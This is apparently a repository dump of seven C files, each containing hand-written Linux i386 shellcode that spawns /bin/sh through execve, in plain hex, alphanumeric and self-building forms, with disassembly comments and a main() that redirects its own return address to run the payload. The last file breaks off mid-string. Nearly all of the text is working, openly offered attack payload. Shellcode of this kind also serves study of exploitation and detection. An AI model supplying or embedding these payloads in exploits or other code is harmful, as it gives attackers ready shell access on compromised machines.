├── buffer-i386-alpha.c ├── buffer-i386-cool.c ├── buffer-i386-crazy.c ├── buffer-i386-delirium.c ├── buffer-i386-raptus.c ├── buffer-i386-reallycool.c └── buffer-i386-short.c /buffer-i386-alpha.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 
28 | * 29 | */ 30 | 31 | char shellcode[] = "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0T" 32 | "odjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Do" 33 | "w0towjhXfRhnKshhBabivERSvT29"; 34 | 35 | main() { 36 | long *ret; 37 | 38 | ret = (long *)&ret + 2; 39 | (*ret) = (long)shellcode; 40 | 41 | } 42 | 43 | -------------------------------------------------------------------------------- /buffer-i386-cool.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTR@CT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | * 30 | * 80483c3: 31 d2 xor %edx,%edx 31 | * 80483c5: 52 push %edx 32 | * 80483c6: 68 6e 2f 73 68 push $0x68732f6e 33 | * 80483cb: 68 2f 2f 62 69 push $0x69622f2f 34 | * 80483d0: 89 e3 mov %esp,%ebx 35 | * 80483d2: 52 push %edx 36 | * 80483d3: 53 push %ebx 37 | * 80483d4: 89 e1 mov %esp,%ecx 38 | * 80483d6: 6a 0b push $0xb 39 | * 80483d8: 51 push %ecx 40 | * 80483d9: 52 push %edx 41 | * 80483da: 53 push %ebx 42 | * 80483db: 83 ec 10 sub $0x10,%esp 43 | * 80483de: 61 popa 44 | * 80483df: cd 80 int $0x80 45 | * 46 | */ 47 | 48 | char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" 49 | "\x52\x53\x89\xe1\x6a\x0b\x51\x52\x53\x83\xec\x10\x61\xcd\x80"; 50 | 51 | main() { 52 | long *ret; 53 | 54 | ret = (long *)&ret + 2; 55 | (*ret) = (long)shellcode; 56 | 57 | } 58 | 59 | -------------------------------------------------------------------------------- /buffer-i386-crazy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. 
Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 
28 | * 29 | */ 30 | 31 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68" 32 | "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1" 33 | "THREE.RULES.TO.CODE.COOL.SHELLCODES" 34 | "\x44\x44\x83\xc4\x20\x40\x40\x80\xeb\x03\x66" 35 | "\x83\xc7\x05\x66\x83\xed\x06\x51" 36 | "IF.LIFE.IS.SHORT.YOUR.SHELLCODE.SHOULD.BE.SHORTER" 37 | "\x44\x44\x83\xc4\x30\x59\x04\x04\x4b\x4a\x4e" 38 | "\x4e\x66\x83\xc7\x05\x66\x83\xed\x05\x51" 39 | "NEVER.THINK.ABOUT.YOUR.MOMMY.WHILE.CODING" 40 | "\x83\xc4\x18\x59\x40\x40\x4a\x66\x83\xc6\x03" 41 | "\x66\x83\xc7\x03\x55" 42 | "DONT.TOUCH.REGISTERS.TITS.ARE.BETTER" 43 | "\x4c\x83\xc4\x3c\x40\x4b\x41\x4a\x46\x47\x66" 44 | "\x83\xed\x05\xcd\x80"; 45 | 46 | main() { 47 | long *ret; 48 | 49 | ret = (long *)&ret + 2; 50 | (*ret) = (long)shellcode; 51 | 52 | } 53 | 54 | -------------------------------------------------------------------------------- /buffer-i386-delirium.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2003 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | 32 | /* 33 | * This is an alphanumeric code completely written by hand which builds a 34 | * shellcode and then executes it. It can be considered as the evolution 35 | * of buffer-i386-raptus.c. In fact, in that shellcode, just the last asm 36 | * instruction (int $0x80) is built at run-time. Here everything is built 37 | * at run-time! Just a nice delirium, isn't it?! 8) 38 | * This code was developed using Fenris by Michael Zalewski which helped 39 | * me a great deal during development. As you can see from the comments below, 40 | * this shellcode works fine if __GNUC__ < 3. This is due to optimizations 41 | * introduced by gcc with __GNUC__ 3. At this moment a version for such 42 | * compilers is not available, but it will probably come in the near 43 | * future. Have fun! 
44 | */ 45 | 46 | #include 47 | 48 | main() 49 | { 50 | 51 | 52 | #if GCC_VERSION < 3000 53 | 54 | 55 | long *ret; 56 | char shellcode[] = "h3Zo0" // 68 33 5a 6f 30 push $0x306f5a33 57 | "X" // 58 pop %eax 58 | "5YQ7O" // 35 59 51 37 4f xor $0x4f375159,%eax 59 | "P" // 50 push %eax 60 | "D" // 44 inc %esp 61 | "D" // 44 inc %esp 62 | "D" // 44 inc %esp 63 | "Y" // 59 pop %ecx 64 | "A" // 41 inc %ecx 65 | "A" // 41 inc %ecx 66 | "A" // 41 inc %ecx 67 | "A" // 41 inc %ecx 68 | "A" // 41 inc %ecx 69 | "A" // 41 inc %ecx 70 | "A" // 41 inc %ecx 71 | "A" // 41 inc %ecx 72 | "A" // 41 inc %ecx 73 | "A" // 41 inc %ecx 74 | "A" // 41 inc %ecx 75 | "A" // 41 inc %ecx 76 | "A" // 41 inc %ecx 77 | "A" // 41 inc %ecx 78 | "A" // 41 inc %ecx 79 | "A" // 41 inc %ecx 80 | "A" // 41 inc %ecx 81 | "A" // 41 inc %ecx 82 | "A" // 41 inc %ecx 83 | "A" // 41 inc %ecx 84 | "A" // 41 inc %ecx 85 | "A" // 41 inc %ecx 86 | "A" // 41 inc %ecx 87 | "A" // 41 inc %ecx 88 | "A" // 41 inc %ecx 89 | "A" // 41 inc %ecx 90 | "Q" // 51 push %ecx 91 | "L" // 4c dec %esp 92 | "L" // 4c dec %esp 93 | "L" // 4c dec %esp 94 | "Y" // 59 pop %ecx 95 | "hfXZn" // 68 66 58 5a 6e push $0x6e565866 96 | "X" // 58 pop %eax 97 | "5404A" // 35 34 30 34 41 xor $0x41343034,%eax 98 | "P" // 50 push %eax 99 | "Z" // 5a pop %edx 100 | "hGXXn" // 68 47 58 58 6e push $0x6e585847 101 | "X" // 58 pop %eax 102 | "5400A" // 35 34 30 30 41 xor $0x41303034,%eax 103 | "L" // 4c dec %esp 104 | "L" // 4c dec %esp 105 | "L" // 4c dec %esp 106 | "P" // 50 push %eax 107 | "R" // 52 push %edx 108 | "Q" // 51 push %ecx 109 | "D" // 44 inc %esp 110 | "D" // 44 inc %esp 111 | "D" // 44 inc %esp 112 | "D" // 44 inc %esp 113 | "D" // 44 inc %esp 114 | "D" // 44 inc %esp 115 | "D" // 44 inc %esp 116 | "D" // 44 inc %esp 117 | "D" // 44 inc %esp 118 | "D" // 44 inc %esp 119 | "D" // 44 inc %esp 120 | "D" // 44 inc %esp 121 | "D" // 44 inc %esp 122 | "D" // 44 inc %esp 123 | "D" // 44 inc %esp 124 | "D" // 44 inc %esp 125 | "hn000" // 68 6e 
30 30 30 push $0x3030306e 126 | "X" // 58 pop %eax 127 | "5ARYO" // 35 41 52 59 4f xor $0x4f595241,%eax 128 | "P" // 50 push %eax 129 | "D" // 44 inc %esp 130 | "D" // 44 inc %esp 131 | "D" // 44 inc %esp 132 | "Y" // 59 pop %ecx 133 | "A" // 41 inc %ecx 134 | "A" // 41 inc %ecx 135 | "A" // 41 inc %ecx 136 | "A" // 41 inc %ecx 137 | "A" // 41 inc %ecx 138 | "A" // 41 inc %ecx 139 | "A" // 41 inc %ecx 140 | "A" // 41 inc %ecx 141 | "A" // 41 inc %ecx 142 | "A" // 41 inc %ecx 143 | "Q" // 51 push %ecx 144 | "D" // 44 inc %esp 145 | "D" // 44 inc %esp 146 | "D" // 44 inc %esp 147 | "D" // 44 inc %esp 148 | "D" // 44 inc %esp 149 | "h0000" // 68 30 30 30 30 push $0x30303030 150 | "X" // 58 pop %eax 151 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 152 | "H" // 48 dec %eax 153 | "H" // 48 dec %eax 154 | "H" // 48 dec %eax 155 | "H" // 48 dec %eax 156 | "H" // 48 dec %eax 157 | "H" // 48 dec %eax 158 | "H" // 48 dec %eax 159 | "H" // 48 dec %eax 160 | "H" // 48 dec %eax 161 | "H" // 48 dec %eax 162 | "H" // 48 dec %eax 163 | "H" // 48 dec %eax 164 | "H" // 48 dec %eax 165 | "H" // 48 dec %eax 166 | "H" // 48 dec %eax 167 | "H" // 48 dec %eax 168 | "H" // 48 dec %eax 169 | "H" // 48 dec %eax 170 | "H" // 48 dec %eax 171 | "H" // 48 dec %eax 172 | "H" // 48 dec %eax 173 | "H" // 48 dec %eax 174 | "H" // 48 dec %eax 175 | "H" // 48 dec %eax 176 | "H" // 48 dec %eax 177 | "H" // 48 dec %eax 178 | "H" // 48 dec %eax 179 | "H" // 48 dec %eax 180 | "H" // 48 dec %eax 181 | "P" // 50 push %eax 182 | "D" // 44 inc %esp 183 | "D" // 44 inc %esp 184 | "D" // 44 inc %esp 185 | "D" // 44 inc %esp 186 | "D" // 44 inc %esp 187 | "P" // 50 push %eax 188 | "Z" // 5a pop %edx 189 | "hffff" // 68 66 66 66 66 push $66666666 190 | "X" // 58 pop %eax 191 | "54545" // 35 34 35 34 35 xor $0x35343534,%eax 192 | "P" // 50 push %eax 193 | "D" // 44 inc %esp 194 | "D" // 44 inc %esp 195 | "D" // 44 inc %esp 196 | "D" // 44 inc %esp 197 | "D" // 44 inc %esp 198 | "D" // 44 inc %esp 199 | "Q" // 
51 push %ecx 200 | "J" // 4a dec %edx 201 | "J" // 4a dec %edx 202 | "D" // 44 inc %esp 203 | "D" // 44 inc %esp 204 | "D" // 44 inc %esp 205 | "D" // 44 inc %esp 206 | "D" // 44 inc %esp 207 | "R" // 52 push %edx 208 | "D" // 44 inc %esp 209 | "D" // 44 inc %esp 210 | "D" // 44 inc %esp 211 | "D" // 44 inc %esp 212 | "D" // 44 inc %esp 213 | "h0000" // 68 30 30 30 30 push $0x30303030 214 | "X" // 58 pop %eax 215 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 216 | "H" // 48 dec %eax 217 | "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax 218 | "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax 219 | "P" // 50 push %eax 220 | "D" // 44 inc %esp 221 | "D" // 44 inc %esp 222 | "D" // 44 inc %esp 223 | "D" // 44 inc %esp 224 | "D" // 44 inc %esp 225 | "D" // 44 inc %esp 226 | "D" // 44 inc %esp 227 | "D" // 44 inc %esp 228 | "D" // 44 inc %esp 229 | "D" // 44 inc %esp 230 | "D" // 44 inc %esp 231 | "D" // 44 inc %esp 232 | "D" // 44 inc %esp 233 | "D" // 44 inc %esp 234 | "D" // 44 inc %esp 235 | "D" // 44 inc %esp 236 | "D" // 44 inc %esp 237 | "D" // 44 inc %esp 238 | "D" // 44 inc %esp 239 | "D" // 44 inc %esp 240 | "D" // 44 inc %esp 241 | "D" // 44 inc %esp 242 | "D" // 44 inc %esp 243 | "D" // 44 inc %esp 244 | "H" // 48 dec %eax 245 | ; 246 | 247 | 248 | ret = (long *)&ret + 2; 249 | (*ret) = (long)shellcode; 250 | 251 | #else 252 | # error "This shellcode doesn't work if compiled with gcc-3.x. " 253 | # error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...." 254 | #endif 255 | 256 | } 257 | 258 | -------------------------------------------------------------------------------- /buffer-i386-raptus.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2003 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 
7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 28 | * 29 | */ 30 | 31 | 32 | /* 33 | * This is an alphanumeric shellcode completely written by hand. It was 34 | * developed using Fenris by Michael Zalewski which helped me a great deal 35 | * during development. As you can see from the comments below, this shellcode 36 | * works fine if __GNUC__ < 3. This is due to optimizations introduced by 37 | * gcc with __GNUC__ 3. At this moment a version for such compilers is not 38 | * available, but it will probably come in the near future. 
39 | * 40 | * Thanks : 41 | * ALoR - he suggested to me the idea of 'pushing the unobtainable' 8) 42 | * 43 | */ 44 | 45 | 46 | #include 47 | 48 | main() 49 | { 50 | 51 | #if GCC_VERSION < 3000 52 | 53 | long *ret; 54 | char shellcode[] = "h0000" // 68 30 30 30 30 push $0x30303030 55 | "X" // 58 pop %eax 56 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 57 | "H" // 48 dec %eax 58 | "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax 59 | "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax 60 | "L" // 4c dec %esp 61 | "L" // 4c dec %esp 62 | "L" // 4c dec %esp 63 | "L" // 4c dec %esp 64 | "L" // 4c dec %esp 65 | "L" // 4c dec %esp 66 | "L" // 4c dec %esp 67 | "L" // 4c dec %esp 68 | "L" // 4c dec %esp 69 | "L" // 4c dec %esp 70 | "L" // 4c dec %esp 71 | "P" // 50 push %eax 72 | "D" // 44 inc %esp 73 | "D" // 44 inc %esp 74 | "D" // 44 inc %esp 75 | "D" // 44 inc %esp 76 | "D" // 44 inc %esp 77 | "D" // 44 inc %esp 78 | "D" // 44 inc %esp 79 | "D" // 44 inc %esp 80 | "D" // 44 inc %esp 81 | "D" // 44 inc %esp 82 | "D" // 44 inc %esp 83 | "D" // 44 inc %esp 84 | "D" // 44 inc %esp 85 | "D" // 44 inc %esp 86 | "D" // 44 inc %esp 87 | "D" // 44 inc %esp 88 | "D" // 44 inc %esp 89 | "D" // 44 inc %esp 90 | "D" // 44 inc %esp 91 | "D" // 44 inc %esp 92 | "D" // 44 inc %esp 93 | "D" // 44 inc %esp 94 | "D" // 44 inc %esp 95 | "D" // 44 inc %esp 96 | "D" // 44 inc %esp 97 | "D" // 44 inc %esp 98 | "D" // 44 inc %esp 99 | "D" // 44 inc %esp 100 | "D" // 44 inc %esp 101 | "D" // 44 inc %esp 102 | "D" // 44 inc %esp 103 | "D" // 44 inc %esp 104 | "D" // 44 inc %esp 105 | "D" // 44 inc %esp 106 | "D" // 44 inc %esp 107 | "D" // 44 inc %esp 108 | "D" // 44 inc %esp 109 | "D" // 44 inc %esp 110 | "D" // 44 inc %esp 111 | "D" // 44 inc %esp 112 | "D" // 44 inc %esp 113 | "D" // 44 inc %esp 114 | "D" // 44 inc %esp 115 | "D" // 44 inc %esp 116 | "D" // 44 inc %esp 117 | "D" // 44 inc %esp 118 | "D" // 44 inc %esp 119 | "D" // 44 inc %esp 120 | "D" // 44 inc %esp 121 | "D" // 44 inc %esp 
122 | "D" // 44 inc %esp 123 | "D" // 44 inc %esp 124 | "D" // 44 inc %esp 125 | "D" // 44 inc %esp 126 | "D" // 44 inc %esp 127 | "D" // 44 inc %esp 128 | "D" // 44 inc %esp 129 | "D" // 44 inc %esp 130 | "D" // 44 inc %esp 131 | "hZZZZ" // 68 5a 5a 5a 5a push $0x5a5a5a5a 132 | "X" // 58 pop %eax 133 | "5ZZZZ" // 35 5a 5a 5a 5a xor $0x5a5a5a5a,%eax 134 | "P" // 50 push %eax 135 | "hn0sh" // 68 6e 30 73 68 push $0x6873306e 136 | "D" // 44 inc %esp 137 | "Y" // 59 pop %ecx 138 | "I" // 49 dec %ecx 139 | "Q" // 51 push %ecx 140 | "L" // 4c dec %esp 141 | "h00bi" // 68 30 30 62 69 push $0x69623030 142 | "Y" // 59 pop %ecx 143 | "I" // 49 dec %ecx 144 | "Q" // 51 push %ecx 145 | "D" // 44 inc %esp 146 | "Y" // 59 pop %ecx 147 | "I" // 49 dec %ecx 148 | "Q" // 51 push %ecx 149 | "L" // 4c dec %esp 150 | "T" // 54 push %esp 151 | "Z" // 5a pop %edx 152 | "P" // 50 push %eax 153 | "R" // 52 push %edx 154 | "T" // 54 push %esp 155 | "Y" // 59 pop %ecx 156 | "hXPPP" // 68 58 50 50 50 push $0x50505058 157 | "X" // 58 pop %eax 158 | "5SPPP" // 35 53 50 50 50 xor $0x50505053,%eax 159 | "P" // 50 push %eax 160 | "h0000" // 68 30 30 30 30 push $0x30303030 161 | "X" // 58 pop %eax 162 | "50000" // 35 30 30 30 30 xor $0x30303030,%eax 163 | "Q" // 51 push %ecx 164 | "P" // 50 push %eax 165 | "R" // 52 push %edx 166 | "U" // 55 push %ebp 167 | "T" // 54 push %esp 168 | "V" // 56 push %esi 169 | "W" // 57 push %edi 170 | "a"; // 61 popa 171 | 172 | 173 | ret = (long *)&ret + 2; 174 | (*ret) = (long)shellcode; 175 | 176 | #else 177 | # error "This shellcode doesn't work if compiled with gcc-3.x. " 178 | # error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...." 179 | #endif 180 | 181 | } 182 | 183 | -------------------------------------------------------------------------------- /buffer-i386-reallycool.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) 
(linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 18 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 19 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 21 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 22 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 23 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 26 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 27 | * SUCH DAMAGE. 
28 | * 29 | * 30 | * 80483c3: 6a 0b push $0xb 31 | * 80483c5: 58 pop %eax 32 | * 80483c6: 99 cltd 33 | * 80483c7: 52 push %edx 34 | * 80483c8: 68 6e 2f 73 68 push $0x68732f6e 35 | * 80483cd: 68 2f 2f 62 69 push $0x69622f2f 36 | * 80483d2: 89 e3 mov %esp,%ebx 37 | * 80483d4: 50 push %eax 38 | * 80483d5: 8d 4c 24 f4 lea 0xfffffff4(%esp,1),%ecx 39 | * 80483d9: 51 push %ecx 40 | * 80483da: 52 push %edx 41 | * 80483db: 53 push %ebx 42 | * 80483dc: 83 ec 10 sub $0x10,%esp 43 | * 80483df: 61 popa 44 | * 80483e0: cd 80 int $0x80 45 | * 46 | */ 47 | 48 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" 49 | "\x50\x8d\x4c\x24\xf4\x51\x52\x53\x83\xec\x10\x61\xcd\x80"; 50 | 51 | main() { 52 | long *ret; 53 | 54 | ret = (long *)&ret + 2; 55 | (*ret) = (long)shellcode; 56 | 57 | } 58 | 59 | -------------------------------------------------------------------------------- /buffer-i386-short.c: -------------------------------------------------------------------------------- 1 | /* 2 | * execve ("/bin/sh"..) (linux little endian) 3 | * 4 | * Copyright (c) 2002 Angelo Dell'Aera 5 | * Alberto Ornaghi 6 | * 7 | * All rights reserved. 8 | * 9 | * Redistribution and use in source and binary forms, with or without 10 | * modification, are permitted provided that the following conditions 11 | * are met: 12 | * 1. Redistributions of source code must retain the above copyright 13 | * notice, this list of conditions and the following disclaimer. 14 | * 2. Redistributions in binary form must reproduce the above copyright 15 | * notice, this list of conditions and the following disclaimer in the 16 | * documentation and/or other materials provided with the distribution. 17 | * 18 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 19 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 20 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 21 | * ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 22 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 23 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 24 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 25 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 26 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 27 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 28 | * SUCH DAMAGE. 29 | * 30 | * 31 | * 80483c3: 6a 0b push $0xb 32 | * 80483c5: 58 pop %eax 33 | * 80483c6: 99 cltd 34 | * 80483c7: 52 push %edx 35 | * 80483c8: 68 6e 2f 73 68 push $0x68732f6e 36 | * 80483cd: 68 2f 2f 62 69 push $0x69622f2f 37 | * 80483d2: 89 e3 mov %esp,%ebx 38 | * 80483d4: 52 push %edx 39 | * 80483d5: 53 push %ebx 40 | * 80483d6: 89 e1 mov %esp,%ecx 41 | * 80483d8: cd 80 int $0x80 42 | * 43 | */ 44 | 45 | char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68" 46 | "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89" 